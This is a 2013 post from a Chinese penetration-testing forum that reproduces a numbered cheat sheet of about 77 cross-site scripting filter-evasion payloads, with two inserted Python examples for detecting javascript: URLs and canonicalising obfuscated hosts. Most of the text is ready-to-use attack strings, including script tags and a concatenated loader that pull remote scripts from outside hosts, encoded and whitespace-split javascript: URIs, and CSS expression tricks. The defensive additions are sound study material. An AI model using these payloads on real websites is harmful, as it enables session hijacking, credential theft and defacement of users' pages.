China Network Penetration Testing Alliance
Title: XSS Attack Summary
Author: admin
Time: 2013-4-19 19:22

It seems t00ls has relatively little material on XSS. I saw something good and copied it over; not sure whether any fellow members need to bookmark it.

(1) Normal XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using the JavaScript directive

<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon and no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)

<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)

<IMG SRC=jav..omitted..S')>

(9) 7-digit UTF-8 Unicode encoding without semicolons (calculator)

<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons (calculator)

<IMG SRC=java..omitted..XSS')>

(11) Embedded tab to break up the JavaScript

<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab to break up the JavaScript

<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example

<IMG SRC="javascript:alert('XSS')">

(16) Getting around character limits (must be on the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character

12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread ... table&tid=15267
2/6

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters have basically no effect domestically, because there is nowhere they can be exploited

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the IMG tag JavaScript

<IMG SRC=" javascript:alert('XSS');">
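
Added example, not part of the original post: a Python server-side check showing why a filter has to decode HTML character references and strip the whitespace and control characters the browser ignores before it looks for a javascript: or vbscript: scheme, exercised on constructed attribute values modelled on items (4), (5), (9), (10), (12), (13), (17), (19) and (40). The function names and the sample list are assumptions of this example.

```python
import html
import re

# Code points a lenient browser ignored inside a URL value, the set named in
# item (47) (1-32, 160, 8192-8200, 12288, 65279) plus NUL from item (17).
# The quote characters 34 and 39 in that list delimit the attribute, so they
# are not dropped here.
IGNORED = set(range(0, 33)) | {0xA0, 0x3000, 0xFEFF} | set(range(0x2000, 0x2009))


def canonical_scheme(attr_value):
    """Lowercased URL scheme a browser would see in an attribute such as IMG SRC
    or A HREF, or '' when the value has no scheme. Entities are decoded first:
    items (5), (8)-(10) hide javascript: behind decimal, 7-digit and hex
    references with and without semicolons, all of which html.unescape accepts."""
    decoded = html.unescape(attr_value)
    # Remove the tab/newline/CR/NUL/space tricks of items (11)-(15), (17)-(19)
    # anywhere in the value; this is a deliberately conservative superset of
    # what current browsers strip (tab, CR, LF anywhere; C0/space at the edges).
    cleaned = "".join(ch for ch in decoded if ord(ch) not in IGNORED)
    match = re.match(r"([A-Za-z][A-Za-z0-9+.-]*):", cleaned)
    return match.group(1).lower() if match else ""


def is_script_url(attr_value):
    """True when the value would run script through the schemes seen on this page."""
    return canonical_scheme(attr_value) in {"javascript", "vbscript"}


# Constructed inputs modelled on the page's items (assumed values, not live data).
SAMPLES = [
    ("JaVaScRiPt:alert('XSS')", True),                                  # (4)
    ("&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')", True),  # (5)
    ("&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099"
     "&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')", True),  # (9)
    ("&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')", True),  # (10)
    ("jav&#x09;ascript:alert('XSS');", True),                           # (12)
    ("jav\nascript:alert('XSS');", True),                               # (13)
    ("java\x00script:alert(\"XSS\")", True),                            # (17)
    (" javascript:alert('XSS');", True),                                # (19)
    ("vbscript:msgbox(\"XSS\")", True),                                 # (40)
    ("http://3w.org/XSS/xss.js", False),                                # plain URL
    ("/images/logo.png", False),                                        # relative path
]


def check_samples():
    """Return the samples whose classification disagrees with the expectation."""
    return [(v, e, is_script_url(v)) for v, e in SAMPLES if is_script_url(v) != e]


if __name__ == "__main__":
    for value, expected in SAMPLES:
        print(f"{str(expected):5} {canonical_scheme(value) or '-':10} {value!r}")
```

A plain substring search for "javascript:" on the raw attribute value misses every entry in the list except the first; the check above classifies all of them correctly.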

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS to 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS to 3

<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript

\";alert('XSS');//

(30) End TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image

<INPUT SRC="javascript:alert('XSS');">

(32) BODY Image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY ONLOAD=alert('XSS')>

(34) IMG Dynsrc

<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG Lowsrc

<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND

<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript

<IMG SRC='vbscript:msgbox("XSS")'>

(41) META with link URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE (made of an open angle bracket followed by a letter)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method

exppression(alert("XSS"))'>

(53) STYLE background

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed Flash that contains the XSS

<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Using ActionScript in Flash, you can sneak your XSS code in

a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the HTC file must be on the same server as your XSS vector

<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can add JS code inside an image to exploit it

<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded commands; can execute arbitrary commands

<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded commands (a.jpg on the same server)

Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filtering

<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)

<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)

<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)

<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)

<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)

<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)

<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL evasion

<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding

<A HREF="http://3w.org">XSS</A>

(70) IP in decimal

<A HREF="http://3232235521">XSS</A>

(71) IP in hexadecimal

<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal

<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding

<A HREF="h tt p://6 6.000146.0x7.147/">XSS</A>

(74) Dropping [http:]

<A HREF="//www.google.com/">XSS</A>

(75) Dropping [www]

<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS (trailing dot)

<A HREF="http://www.google.com./">XSS</A>
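
Added example, not part of the original post: a Python host canonicaliser for a URL allow/deny list, which collapses the decimal, hex, octal and mixed IP spellings of items (70)-(73), the scheme-relative form of (74) and the trailing-dot form of (76) to one comparable host. It goes slightly beyond the page by also accepting the two- and three-part numeric forms inet_aton allows. The function names are assumptions of this example.

```python
from urllib.parse import urlsplit


def parse_ipv4_part(part):
    """One dotted component as inet_aton reads it: 0x.. is hex, a leading 0 is
    octal, anything else is decimal. Raises ValueError for non-numeric text."""
    if part[:2].lower() == "0x":
        return int(part[2:] or "0", 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def canonical_ipv4(host):
    """Dotted-quad form of any inet_aton-style spelling (items 70-73), or None
    when the host is not numeric. One to four parts are accepted; the last part
    fills all remaining bytes, so 0x7f.1 and 3232235521 are valid addresses."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [parse_ipv4_part(p) for p in parts]
    except ValueError:
        return None
    last_bits = 8 * (5 - len(nums))          # 32, 24, 16 or 8 bits for the last part
    if any(n > 255 for n in nums[:-1]) or nums[-1] >= 1 << last_bits:
        return None
    value = 0
    for n in nums[:-1]:
        value = (value << 8) | n
    value = (value << last_bits) | nums[-1]
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def canonical_host(url):
    """Comparable host for an absolute or scheme-relative URL: lowercase, the
    absolute-DNS trailing dot of item (76) removed, numeric IPs normalised.
    Returns None for URLs without an authority, such as javascript: links.
    google.com and www.google.com (item 75) stay distinct hosts; a deny-list
    has to match on the registrable domain if it wants to cover both."""
    host = urlsplit(url).hostname            # already lowercased; None if absent
    if host is None:
        return None
    host = host.rstrip(".")
    return canonical_ipv4(host) or host


if __name__ == "__main__":
    for link in ("http://3232235521", "http://0xc0.0xa8.0x00.0x01",
                 "http://0300.0250.0000.0001", "http://66.000146.0x7.147/",
                 "//www.google.com/", "http://www.google.com./"):
        print(f"{link:32} -> {canonical_host(link)}")
```

The first three links all canonicalise to 192.168.0.1, so a list that compares canonical hosts treats them as the same destination; comparing the raw HREF strings would not.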

(77) javascript link

<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Original source: http://fuzzexp.org/u/0day/?p=14

Welcome to the China Network Penetration Testing Alliance (https://cobjon.com/)
Powered by Discuz! X3.2